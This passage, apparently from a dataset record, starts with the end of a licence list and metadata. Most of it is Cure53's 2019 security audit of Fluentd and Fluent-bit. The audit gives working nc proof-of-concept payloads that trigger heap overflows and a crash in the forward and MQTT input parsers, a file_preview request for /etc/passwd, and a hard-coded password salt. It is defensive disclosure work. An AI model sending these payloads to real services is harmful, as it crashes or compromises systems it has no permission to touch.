AND\nFITNESS, IN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE\nFOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\nACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT\nOF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n70\nThe Unlicense\nThis is free and unencumbered software released into the public domain.\nAnyone is free to copy, modify, publish, use, compile, sell, or distribute this software, either in source code form or as a\ncompiled binary, for any purpose, commercial or non-commercial, and by any means.\nIn jurisdictions that recognize copyright laws, the author or authors of this software dedicate any and all copyright interest in\nthe software to the public domain. We make this dedication for the benefit of the public at large and to the detriment of our\nheirs and successors. We intend this dedication to be an overt act of relinquishment in perpetuity of all present and future\nrights to this software under copyright law.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\nBUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\nNONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n71\nDo What The F*ck You Want To Public License\nVersion 2, December 2004\nCopyright (C) 2004 Sam Hocevar\nEveryone is permitted to copy and distribute verbatim or modified copies of this license document, and changing it is allowed\nas long as the name is changed.\nDO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n0. You just DO WHAT THE FUCK YOU WANT TO.\n72\nXinetd License\nORIGINAL LICENSE:\nThis software is\n(c) Copyright 1992 by Panagiotis Tsirigotis\nThe author (Panagiotis Tsirigotis) grants permission to use, copy,\nand distribute this software and its documentation for any purpose\nand without fee, provided that the above copyright notice extant in\nfiles in this distribution is not removed from files included in any\nredistribution and that this copyright notice is also included in any\nredistribution.\nModifications to this software may be distributed, either by distributing\nthe modified software or by distributing patches to the original software,\nunder the following additional terms:\n1. The version number will be modified as follows:\na. The first 3 components of the version number\n(i.e ..) will remain unchanged.\nb. A new component will be appended to the version number to indicate\nthe modification level. The form of this component is up to the\nauthor of the modifications.\n2. The author of the modifications will include his/her name by appending it\nalong with the new version number to this file and will be responsible for\nany wrong behavior of the modified software.\nThe author makes no representations about the suitability of this\nsoftware for any purpose. It is provided \"as is\" without any express\nor implied warranty.\nModifications:\nVersion 2.3.15.x\nCopyright 2017 SUSE LINUX GmbH and other parties\nModifications:\nVersion: 2.1.8.7-current\nCopyright 1998-2001 by Rob Braun\nSensor Addition\nVersion: 2.1.8.9pre14a\nCopyright 2001 by Steve Grubb\nThis is an exerpt from an email I recieved from the original author, allowing\nxinetd as maintained by me, to use the higher version numbers:\nI appreciate your maintaining the version string guidelines as specified\nin the copyright. But I did not mean them to last as long as they did.\nSo, if you want, you may use any 2.N.* (N >= 3) version string for future\nxinetd versions that you release. Note that I am excluding the 2.2.* line;\nusing that would only create confusion. Naming the next release 2.3.0\nwould put to rest the confusion about 2.2.1 and 2.1.8.*.\n73\nThe zlib/libpng License\nCopyright (c)\nThis software is provided ‘as-is’, without any express or implied\nwarranty. In no event will the authors be held liable for any damages\narising from the use of this software.\nPermission is granted to anyone to use this software for any purpose,\nincluding commercial applications, and to alter it and redistribute it\nfreely, subject to the following restrictions:\n1. The origin of this software must not be misrepresented; you must not\nclaim that you wrote the original software. If you use this software\nin a product, an acknowledgment in the product documentation would be\nappreciated but is not required.\n2. Altered source versions must be plainly marked as such, and must not be\nmisrepresented as being the original software.\n3. This notice may not be removed or altered from any source\ndistribution.\n" } ]
{ "category": "Observability and Analysis", "file_name": "SECURITY_AUDIT.pdf", "project_name": "Fluentd", "subcategory": "Observability" }
[ { "data": " Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nPentest-Report Fluentd, Fluent-Bit Plugins 05.2019\nCure53, Dr.-Ing. M. Heiderich, M. Wege, MSc. N. Krein, BSc. J. Hector, BSc. F. Fäßler\nIndex\nIntroduction\nScope\nTest Methodology\nPart 1. Manual code auditing\nPart 2. Code-assisted penetration testing\nIdentified Vulnerabilities\nFLU-01-003 fluent-bit/in_forward: Heap overflow via negative length (Critical)\nFLU-01-004 fluent-bit: Missing Error-Checking leads to DoS (Medium)\nFLU-01-005 fluent-bit/in_mqtt: Heap overflow in MQTT parser (Critical)\nFLU-01-006 fluent-bit/in_mqtt: Heap overflow due to negative size (Critical)\nMiscellaneous Issues\nFLU-01-001 fluent-ui: User-model implements static password-salt (Low)\nFLU-01-002 fluent-bit: flb_malloc-functions permit zero-sized allocations (Low)\nConclusions\nCure53, Berlin · 05/30/19 1/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIntroduction\n“fluentd is an open source data collector, which lets you unify the data collection and\nconsumption for a better use and understanding of data.”\nFrom https://www.fluentd.org/architecture\nThis report showcases the results of a security assessment targeting the Fluentd\nsoftware compound. Carried out by Cure53 in May 2019, this project entailed both a\npenetration test and a source code audit. Besides Fluentd itself, the core scope also\nincluded selected Fluent-bit plugins. Further, a brief analysis of the Fluentd-UI was also\nconducted. Six security-relevant discoveries were made by Cure53 during the\nassessment.\nAs for the resources, this test was executed by five members of the Cure53 team. The\ntesters dedicated a total of eighteen days to the project and it is believed that good\ncoverage has been reached within the available budget. As with many other CNCF-\nrelated projects, Cure53 chose to employ a two-pronged approach to evaluating the\nsecurity premise of the Fluentd project. Consequently, the available time has been split\nto allow for combining the source code audit with actual penetration testing against a\nlocally built setup.\nIt can be derived from the above that a white-box methodology has been chosen and\nused. This has proven optimal in previous CNCF-related security assessments and\nindeed worked well for this Fluentd-Cure53 cooperation. To be able to investigate the\nscope in a comprehensive manner, Cure53 had access to all relevant sources. While no\nmaintainer-provided setup was available for this test, Cure53 relied on several locally\nbuilt setups when testing possible vulnerabilities for exploitability.\nContrary to numerous CNCF projects audited by Cure53 in the recent past, the Fluentd\nproject does not rely on the Go language code as much. In fact, the code had been\nwritten mostly in Ruby for Fluentd and in C/C++ for Fluent-bit. This certainly influenced\nthe array of tests in that, for instance, Cure53 viewed fuzzing with AFL as a viable route\nto spotting possible weaknesses.\nUnsurprisingly, the tests yielded more numerous and more diverse issues than the\nassessments against the typical projects in Go. As noted, Cure53 managed to spot six\nissues, four of which were considered to be vulnerabilities and two are documented as\ngeneral weaknesses. Three out of four vulnerabilities were ranked as “ Critical” in terms\nof severity. Quite clearly, these signify extreme risks and exploitability levels. Note\nhowever that all documented issues have been spotted in the Fluent-bit and Fluentd-UI\ncodebases, Fluentd itself passed the tests without noteworthy findings.\nCure53, Berlin · 05/30/19 2/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIn the following sections, this report will first shed light on the scope by supplying the\nURLs to all Fluentd platforms and code repositories in scope. Next up, the focus is\nshifted to methodology and coverage. The report then furnishes case-by-case\ndescriptions of the findings, featuring both technical details and possible mitigation going\nforward when applicable. Based on the results of this spring 2019 assessment, Cure53\nissues a broader verdict about the privacy and security posture of the tested items.\nConclusions about the Fluentd software complex - including Fluent-bit and Fluentd-UI\nare supplied in the final section of this document.\nScope\n•Fluentd software, Fluent-bit plugins, Fluentd web-UI\n◦https://github.com/fluent/fluentd \n◦https://github.com/fluent/fluent-bit \n▪Inspected plugins were:\n•in_tail\n•in_forward\n•out_forward\n•out_elasticsearch\n•filter_kubernetes\n◦https://github.com/fluent/fluentd-ui \n▪minor emphasis, early terminated and moved out of scope\nTest Methodology\nThe following paragraphs describe the testing methodology used during the audit of the\nFluentd codebase and the selected external plugins. The test was divided into two\nphases, each fulfilling different goals. In the first phase, the focus was on manual source\ncode reviews needed to spot insecure code patterns. In this realm, issues around\nmemory corruption, information leakage or similar flaws can often be found. During the\nsecond phase, it was evaluated whether the stated security goals and premise can, in\nfact, withstand real-life attack scenarios.\nPart 1. Manual code auditing\nThis section lists the steps completed during the first phase of the audit against the\nFluentd unified logging layer. It describes the key aspects of the manual code audit.\nSince only a few minor issues were spotted during this part, the list portrays the\nthoroughness of the penetration test and ascertains the quality of the project.\nCure53, Berlin · 05/30/19 3/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n•General Ruby command/code sinks were checked, particularly in respect to their\napplication within the mechanics of plugin integration and execution.\n•Special focus was given to the out_exec plugin. Since the command to be\nexecuted is solely configured via a configuration file and the influenceable\narguments are correctly bound, no obvious vulnerability was discovered.\n•Additional time was spent on checking the functionality of the in_tail,\nout_mongodb, in_http, filter_* and parser_* plugins for path traversals and LPE.\n•The rather limited HTTP-server component only exposes a few endpoints with\nminimal request support and without actionable attack surface.\n•Found the HTTP-client to support multiple types of HTTP-servers to post metric\ndata to; verified the handling of critical response headers like Content-Length.\n•in_tail was audited for buffer overflows in its database functionality, in particular\nfor the usage of ‘%s’ in query construction, along with SQL injection. Extra time\nwas spent on the verification of docker_mode JSON parsing.\n•Typically insecure sinks common in C applications (like sprintf, snprintf, memcpy,\nstrcpy, etc.) were checked for incorrect usage but found unexploitable.\n•Checked authentication handling which was quickly dismissed since exploiting\nthe timing-unsafe code constitutes a rather unrealistic scenario.\n•Audited the base implementation and derived use of protect_from_forgery within\nthe ApplicationController without being able to identify weaknesses.\n•The insecure use of send within Mass-Assignment was deemed unexploitable.\n•Password-change functionality was evaluated, field checks are done correctly.\n•Handling of Rails’ secrets was checked for possibly implicated RCE weakness.\n•Potentially insecure sinks like const_get, system and `` were found unexploitable.\n•Calls to File.open and similar functions were found to be somewhat abusable\n(http://localhost:9292/api/file_preview?file=/etc/passwd ). Later on, they were\ndeemed unexploitable since they are only part of the application’s logic and log-\nfile parsing.\nPart 2. Code-assisted penetration testing\nThe following list documents the steps completed during the second part of the test. A\ncode-assisted penetration test was executed against several local, Fluentd installations\ncreated by the testers themselves. Since only a few miscellaneous issues were found\nduring the first part of the audit, this additional approach was used to ensure maximum\ncoverage of the somewhat loosely defined attack surface. A fuzzer was successfully\nemployed to further support the discovery of otherwise very-hard-to-find vulnerabilities.\n•A dedicated AFL fuzzing-environment was set up to check the parsing\nfunctionality of the external plugins contained within fluent-bit. These entailed:\n◦flb_pack_json_state\nCure53, Berlin · 05/30/19 4/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n◦flb_msgpack_raw_to_json_str\n◦flb_pack_json\n◦flb_router_match\n◦fw_prot_process\n◦mqtt_prot_parser\n•Started investigating the root cause of the FLU-01-003 crash but moved to other\npriorities in order to be able to spend more time on the yet uncovered aspects of\nthe code.\n•Additional pentesting and fuzzing of in_forward was undertaken, in particular in\nlooking at the aspects of msgpack used for the unpacking of JSON data.\n•Further investigation of the remaining crashes within in_forward and the\ndependent msgpack was attempted but did not yield anything of value.\n•ACLs were tested briefly, looking for endpoints that are reachable without being\nauthenticated or could potentially be vulnerable to CSRF attacks.\n•Finally, to save time and resources, test-setups of the dependently complicated\ncomponents like filter_kubernetes, extensive pentesting and fuzzing were\nreplaced with purely manual code auditing.\nIdentified Vulnerabilities\nThe following sections list both vulnerabilities and implementation issues spotted during\nthe testing period. Note that findings are listed in chronological order rather than by their\ndegree of severity and impact. The aforementioned severity rank is simply given in\nbrackets following the title heading for each vulnerability. Each vulnerability is\nadditionally given a unique identifier (e.g. FLU-01-001) for the purpose of facilitating any\nfuture follow-up correspondence.\nFLU-01-003 fluent-bit/in_forward : Heap overflow via negative length (Critical)\nIn fluent-bit’s in_forward plugin, it was possible to spot an exploitable remote heap buffer\noverflow vulnerability. This happens due to incorrect handling of faulty msgpack\npayloads. The vulnerable code can be seen in the following excerpts of the application’s\ncode.\nAffected File:\nfluent-bit/plugins/in_forward/fw_prot.c\nAffected Code:\nint fw_prot_process(struct fw_conn *conn)\n{\n[...]\n unp = msgpack_unpacker_new(1024);\nCure53, Berlin · 05/30/19 5/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n msgpack_unpacked_init(&result);\n conn->rest = conn->buf_len;\n while (1) {\n recv_len = receiver_to_unpacker(conn, EACH_RECV_SIZE, unp);\n \n if (recv_len == 0) {\n /* No more data */\n msgpack_unpacker_free(unp);\n msgpack_unpacked_destroy(&result);\n /* Adjust buffer data */\n \n if (all_used > 0) {\n memmove(conn->buf, conn->buf + all_used,\n conn->buf_len - all_used );\n conn->buf_len -= all_used;\n }\n return 0;\n }\n /* Always summarize the total number of bytes requested to parse */\n buf_off += recv_len;\n ret = msgpack_unpacker_next_with_size (unp, &result, &bytes);\n \n while (ret == MSGPACK_UNPACK_SUCCESS) {\n[...]\n all_used += bytes;\n[...]\n ret = msgpack_unpacker_next(unp, &result);\n }\nIn the call to memmove, it is assumed that conn->buf_len is always larger than all_used.\nTherefore, both values are subtracted to calculate the necessary length for the\nmemmove operation in order to continue with the next msgpack packet. However, the\npayload below shows that this assumption can be broken.\n \nPoC Payload:\necho -ne \"\\x98\\xa0\\xa0AAA\\xa9AAAAAAAAAAA\\x98\\xa0\\xa0AAAAAA\" | nc localhost 24224\nThe incomplete packet fields cause msgpack_unpacker_next_with_size to return and\ncorrectly write the value 18 to the bytes variable. However, the loop below will iterate two\ntimes, thus causing bytes to be added two times to all_used. As a result, all_used equals\n36 because the last call to msgpack_unpacker_next will incorrectly return\nMSGPACK_UNPACK_SUCCESS . Although no following packet exist, memmove will be\nCure53, Berlin · 05/30/19 6/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \ncalled with a length value of -9, causing a heap overflow. The fact that the operation acts\non user-controlled buffers makes successful exploitation very likely. The following\nexcerpt additionally shows the generated ASAN report.\nASAN output:\n$ ./bin/fluent-bit -i forward -o stdout\nFluent Bit v1.2.0\nCopyright (C) Treasure Data\n[2019/05/17 15:50:37] [ info] [storage] initializing...\n[2019/05/17 15:50:37] [ info] [storage] in-memory\n[2019/05/17 15:50:37] [ info] [storage] normal synchronization mode, checksum \ndisabled\n[2019/05/17 15:50:37] [ info] [engine] started (pid=4661)\n[2019/05/17 15:50:37] [ info] [in_fw] binding 0.0.0.0:24224\n[2019/05/17 15:50:37] [ info] [sp] stream processor started\n=================================================================\n==4661==ERROR: AddressSanitizer: negative-size-param : (size=-9)\n #0 0x7f8b729191a0 in __interceptor_memmove \n(/usr/lib/x86_64-linux-gnu/libasan.so.4+0x7b1a0)\n #1 0x562a4c0ae70a in fw_prot_process \nfluent-bit/plugins/in_forward/fw_prot.c:136\n #2 0x562a4c0acc47 in fw_conn_event \nfluent-bit/plugins/in_forward/fw_conn.c:74\n #3 0x562a4c01c90f in flb_engine_start fluent-bit/src/flb_engine.c:514\n #4 0x562a4bff9e21 in main fluent-bit/src/fluent-bit.c:862\n #5 0x7f8b718d8b96 in __libc_start_main \n(/lib/x86_64-linux-gnu/libc.so.6+0x21b96)\n #6 0x562a4bff6ef9 in _start (fluent-bit/build/bin/fluent-bit+0xa7ef9)\n0x62d000000424 is located 36 bytes inside of 32768-byte region \n[0x62d000000400,0x62d000008400)\nallocated by thread T0 here:\n #0 0x7f8b7297cb50 in __interceptor_malloc \n(/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)\n #1 0x562a4c0ac67a in flb_malloc fluent-bit/include/fluent-bit/flb_mem.h:58\n #2 0x562a4c0acf18 in fw_conn_add fluent-bit/plugins/in_forward/fw_conn.c:122\n #3 0x562a4c0abd06 in in_fw_collect fluent-bit/plugins/in_forward/fw.c:92\n #4 0x562a4c00bd0b in flb_input_collector_fd fluent-bit/src/flb_input.c:847\n #5 0x562a4c01c4e6 in flb_engine_handle_event fluent-bit/src/flb_engine.c:262\n #6 0x562a4c01c4e6 in flb_engine_start fluent-bit/src/flb_engine.c:487\n #7 0x562a4bff9e21 in main fluent-bit/src/fluent-bit.c:862\n #8 0x7f8b718d8b96 in __libc_start_main \n(/lib/x86_64-linux-gnu/libc.so.6+0x21b96)\nSUMMARY: AddressSanitizer: negative-size-param \n(/usr/lib/x86_64-linux-gnu/libasan.so.4+0x7b1a0) in __interceptor_memmove\n==4661==ABORTING\nCure53, Berlin · 05/30/19 7/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIt is recommended to implement an additional check and make sure that all_used is not\nlarger than the original buffer size that is stored in conn->buf_len.\nFLU-01-004 fluent-bit: Missing Error-Checking leads to DoS (Medium)\nNext to FLU-01-003, additional fuzzing led to the discovery of a DoS vulnerability due to\ninvalid memory access. This happens because in the same code path msgpack-\n_unpacker_next_with_size can return with an error code that is not taken care off. \nAffected File:\nfluent-bit/plugins/in_forward/fw_prot.c\nAffected Code:\nwhile (1) {\n recv_len = receiver_to_unpacker(conn, EACH_RECV_SIZE, unp);\n[...]\n /* Always summarize the total number of bytes requested to parse */\n buf_off += recv_len;\n ret = msgpack_unpacker_next_with_size (unp, &result, &bytes);\n while (ret == MSGPACK_UNPACK_SUCCESS ) {\nAs one can see in the code above, msgpack_unpacker_next_with_size is only checked\nagainst MSGPACK_UNPACK_SUCCESS without actually bailing out of the surrounding\nwhile (1)-loop when invalid packets are sent. As such, using for example an incomplete\nEXT-format packet (opcode 0xc9) causes a parse error that is not caught, so that the\nnext invocation of msgpack_unpacker_next_with_size happens on invalid memory\noffsets. The following payload can be used to confirm the issue:\nPoC Payload:\n$ echo -ne \"\\x8aAAAAAAAAAAAAAAAAAA\\x8fAAAAA \\xc9\\xff\\xff\\xff\\xff AAAA\" | nc \nlocalhost 24224\nASAN Output:\n$ ./bin/fluent-bit -i forward -o stdout\nFluent Bit v1.2.0\nCopyright (C) Treasure Data\n[2019/05/17 15:48:14] [ info] [storage] initializing...\n[2019/05/17 15:48:14] [ info] [storage] in-memory\nCure53, Berlin · 05/30/19 8/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n[2019/05/17 15:48:14] [ info] [storage] normal synchronization mode, checksum \ndisabled\n[2019/05/17 15:48:14] [ info] [engine] started (pid=4650)\n[2019/05/17 15:48:14] [ info] [in_fw] binding 0.0.0.0:24224\n[2019/05/17 15:48:14] [ info] [sp] stream processor started\n[...]\n=================================================================\n==4650==ERROR: AddressSanitizer: SEGV on unknown address 0x6191000000a1 (pc \n0x556822ee8e2b bp 0x7ffd2490e3a0 sp 0x7ffd2490e370 T0)\n==4650==The signal is caused by a READ memory access.\n #0 0x556822ee8e2a in template_callback_ext \nfluent-bit/lib/msgpack-3.1.1/src/unpack.c:277\n #1 0x556822eeb93e in template_execute \nfluent-bit/lib/msgpack-3.1.1/include/msgpack/unpack_template.h:350\n #2 0x556822eee15b in msgpack_unpacker_execute \nfluent-bit/lib/msgpack-3.1.1/src/unpack.c:471\n #3 0x556822eee5a8 in unpacker_next \nfluent-bit/lib/msgpack-3.1.1/src/unpack.c:538\n #4 0x556822eee761 in msgpack_unpacker_next_with_size fluent-bit/lib/msgpack-\n3.1.1/src/unpack.c:575\n #5 0x556822a98763 in fw_prot_process \nfluent-bit/plugins/in_forward/fw_prot.c:147\n #6 0x556822a96c47 in fw_conn_event fluent-bit/plugins/in_forward/fw_conn.c:74\n #7 0x556822a0690f in flb_engine_start fluent-bit/src/flb_engine.c:514\n #8 0x5568229e3e21 in main fluent-bit/src/fluent-bit.c:862\n #9 0x7f93229d2b96 in __libc_start_main \n(/lib/x86_64-linux-gnu/libc.so.6+0x21b96)\n #10 0x5568229e0ef9 in _start (fluent-bit/build/bin/fluent-bit+0xa7ef9)\nAddressSanitizer can not provide additional info.\nSUMMARY: AddressSanitizer: SEGV fluent-bit/lib/msgpack-3.1.1/src/unpack.c:277 in\ntemplate_callback_ext\nIt is recommended to extend the error checking of msgpack_unpacker_next_with_size\nand include a code path that bails out accordingly whenever this function returns with\ne.g. MSGPACK_UNPACK_PARSE_ERROR .\nFLU-01-005 fluent-bit/in_mqtt : Heap overflow in MQTT parser (Critical)\nDuring the fuzzing investigation of fluent-bit, some crashes in MQTT were observed.\nBecause this input plugin was not included in the scope, the crash at hand was not\nfurther explored. However, the output below and minimal review shows that the crash\nhappens due to a heap overflow. In general, the MQTT parser trusts fields of the\nCure53, Berlin · 05/30/19 9/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nincoming input, such as the length. Thus, the parser might access the data outside of the\nallocated buffer.\nAffected File:\n/fluent-bit/plugins/in_mqtt/mqtt_prot.c\nAffected Code:\nThe following code shows how the hlen is taken from the current buf_pos and then\nadded back again later. Thus, it can move the buf_pos outside of the bounds of the\nbuffer buf[1024].\n #define BUFC() conn->buf[conn->buf_pos]\n // [...]\n /* Topic */\n hlen = BUFC() << 8;\n conn->buf_pos++;\n hlen |= BUFC();\n conn->buf_pos++;\n topic = conn->buf_pos;\n topic_len = hlen;\n conn->buf_pos += hlen;\nProof of Concept:\nIn order to reproduce the issue, fluent-bit should be built with the address sanitizer\nenabled. Otherwise, the process will not immediately crash. The following command will\nsend the malicious test-case to the server.\necho -e -n \"\\x10\\x00\\x10\\x04\\x4d\\x6b\\x54\\x32\\x34\\x01\\x00\\x34\\x01\\x00\\x34\\x00\\\nxfe\\x34\\x01\\x00\\x3c\\xf1\\x0a\\x01\\x00\\x34\\x01\\x00\\x34\\x01\\x00\\x34\\x01\\x00\\x00\\x00\\\nx0a\\x39\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\\nx7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7b\\x7d\\x39\\x79\\x6b\\x6b\\x6b\\x6b\\x6b\\x6b\\\nx6b\\x6b\\x74\\x72\\x6b\\x68\\x6b\\x6b\\x6b\\x6b\\x09\\x00\\x6b\\x09\\x00\\x0a\\x39\\x79\" | nc \n127.0.0.1 1883\nOnce the server receives the message, ASAN will catch the heap overflow and aborts\nwith the following message:\n[2019/05/19 13:08:58] [ warn] MQTT Packet incomplete or is not JSON\n=================================================================\n==79610==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ff04\nat pc 0x5586210a0da4 bp 0x7ffd9f57e120 sp 0x7ffd9f57e110\nREAD of size 1 at 0x61900000ff04 thread T0\n #0 0x5586210a0da3 in mqtt_handle_publish \n/pwd/fix/fluent-bit/plugins/in_mqtt/ mqtt_prot.c:249\nCure53, Berlin · 05/30/19 10/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \n #1 0x5586210a1b3e in mqtt_prot_parser \n/pwd/fix/fluent-bit/plugins/in_mqtt/mqtt_prot.c:381\n #2 0x55862109de28 in mqtt_conn_event \n/pwd/fix/fluent-bit/plugins/in_mqtt/mqtt_conn.c:48\n #3 0x55862101409f in flb_engine_start \n/pwd/fix/fluent-bit/src/flb_engine.c:514\n #4 0x558620ff15b1 in main /pwd/fix/fluent-bit/src/fluent-bit.c:862\n #5 0x7fb161476b96 in __libc_start_main \n(/lib/x86_64-linux-gnu/libc.so.6+0x21b96)\n #6 0x558620fee689 in _start (/pwd/fix/fluent-bit/build/bin/fluent-\nbit+0x8b689)\nAddress 0x61900000ff04 is a wild pointer.\nSUMMARY: AddressSanitizer: heap-buffer-overflow \n/pwd/fix/fluent-bit/plugins/in_mqtt/mqtt_prot.c:249 in mqtt_handle_publish\nShadow bytes around the buggy address:\n 0x0c327fff9fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n=>0x0c327fff9fe0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x0c327fffa000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nThe MQTT parser should be hardened with additional checks of the buf_pos, so that it\ncannot be larger than the size of the buf[1024] buffer. It should also be noted that the\nbuf_pos is an integer, which means it could be negative. This negative index could also\nlead to a heap overflow, thus the position should also not allow values smaller than 0.\nFLU-01-006 fluent-bit/in_mqtt : Heap overflow due to negative size (Critical)\nAnother exploitable heap overflow in the MQTT input plugin was found and could be\nattributed to a negative length value.\nAffected File:\n/fluent-bit/plugins/in_mqtt/mqtt_prot.c\nAffected Code:\nThe mqtt_packet_drop function assumes that the move_bytes derived from the buf_pos\nare always smaller than the buf_len, however this did not hold true. As such, it can lead\nto a negative size value being issued to a memmove.\n// mqtt_packet_drop\n move_bytes = conn->buf_pos + 1;\n memmove(conn->buf,\n conn->buf + move_bytes,\n conn->buf_len - move_bytes);\nCure53, Berlin · 05/30/19 11/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nProof of Concept:\nAn ASAN build is not required to reproduce the issue, however it is helpful for the\nanalysis. The following message will trigger the bad memmove.\necho -n -e \"\\x10\\x80\\x80\\x00\\x30\\x89\\x80\\x00\\x30\\x80\\x80\\x00\\x31\\x2b\\x45\" | nc \n127.0.0.1 1883\nIf tested without ASAN, the malicious packet will lead to a segmentation fault crash.\nHowever, if ASAN is enabled, the following output can be observed:\n==6959==ERROR: AddressSanitizer: negative-size-param: (size=-2)\n #0 0x7f887df041a0 in __interceptor_memmove \n(/usr/lib/x86_64-linux-gnu/libasan.so.4+0x7b1a0)\n #1 0x5637953a6e66 in mqtt_packet_drop \n/pwd/fix/fluent-bit/plugins/in_mqtt/mqtt_prot.c:84\n #2 0x5637953a8ca8 in mqtt_prot_parser \n/pwd/fix/fluent-bit/plugins/in_mqtt/mqtt_prot.c:398\n #3 0x5637953a4e28 in mqtt_conn_event \n/pwd/fix/fluent-bit/plugins/in_mqtt/mqtt_conn.c:48\n #4 0x56379531b09f in flb_engine_start \n/pwd/fix/fluent-bit/src/flb_engine.c:514\n #5 0x5637952f85b1 in main /pwd/fix/fluent-bit/src/fluent-bit.c:862\n #6 0x7f887cec3b96 in __libc_start_main \n(/lib/x86_64-linux-gnu/libc.so.6+0x21b96)\n #7 0x5637952f5689 in _start (/pwd/fix/fluent-bit/fluent-bit_asan+0x8b689)\nIn addition to the bounds-checks on the buf_pos recommended in FLU-01-005, further\nchecks should be introduced to ensure that the buf_pos+1 never exceeds the buf_len.\nCure53, Berlin · 05/30/19 12/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nMiscellaneous Issues\nThis section covers those noteworthy findings that did not lead to an exploit but might aid\nan attacker in achieving their malicious goals in the future. Most of these results are\nvulnerable code snippets that did not provide an easy way to be called. Conclusively,\nwhile a vulnerability is present, an exploit might not always be possible.\nFLU-01-001 fluent-ui: User-model implements static password-salt (Low)\nDuring an analysis of the fluentd’s user-interface for common web security\nvulnerabilities, it was noticed that the administrator’s password hash is insecurely\ngenerated. This is because for each fluent-ui installation, a fixed salt value is chosen for\nthe SHA1 hash algorithm. Here, the salt is manually concatenated with the user’s plain-\ntext password beforehand, as one can see in the affected lines below.\nAffected File:\nfluentd-ui/app/models/user.rb\nAffected Code:\nclass User\n include ActiveModel::Model\n SALT = \"XG16gfdC5IFRaQ3c\".freeze\n ENCRYPTED_PASSWORD_FILE = FluentdUI.data_dir + \"/#{Rails.env}-user-pwhash.txt\"\n[...]\ndef digest(unencrypted_password)\n unencrypted_password ||= \"\"\n hash = Digest::SHA1.hexdigest (SALT + unencrypted_password)\n stretching_cost.times do\n hash = Digest::SHA1.hexdigest (hash + SALT + unencrypted_password)\n end\n hash\nend\nHaving a static salt value creates multiple problems. While password salts are usually\nchosen to prevent rainbow table attacks, having a static salt in popular applications\nmakes it easily possible to create new rainbow tables that are applicable for each\ninstallation of fluent-ui. Additionally, using a single fixed salt also means that every user\nwho inputs the same password will have the same hash. While the latter scenario is not\ndirectly applicable to fluent-ui (because only one user usually exists), this still shows a\nbad security practice.\nCure53, Berlin · 05/30/19 13/16 Dr.-Ing. Mario Heiderich, Cure53\n Bielefelder Str. 14 \n D 10709 Berlin\n cure53.de · mario@cure53.de \nIt is recommended to replace the current hashing mechanism with a modern password\nhashing function such as Argon2.1 This will automatically switch out the old SHA1\nalgorithm and provide additional parameters for the cost value as well.\nFLU-01-002 fluent-bit: flb_malloc-functions permit zero-sized allocations (Low)\nDuring the audit of the fluent-bit’s memory management functionality, it was noticed that\nthe implemented wrappers around malloc omit a size-check for zero-size parameters.\nThis can be seen in the following excerpt from the application’s source code.\nAffected File:\nfluent-bit/include/fluent-bit/flb_mem.h\nAffected Code:\nvoid *flb_malloc(const size_t size) {\n void *aux;\n \n aux = malloc( size);\n if (flb_unlikely(!aux && size)) {\n return NULL;\n }\n return aux;\n}\nDue to the fact that some functions with user-controlled length fields are called without\nadditional integer overflow checks. This is depicted next.\nAffected File:\nfluent-bit/plugins/in_tail/tail_dockermode.c\nAffected Code:\nstatic int unesc_ends_with_nl(char *str, size_t len)\n{\n char* 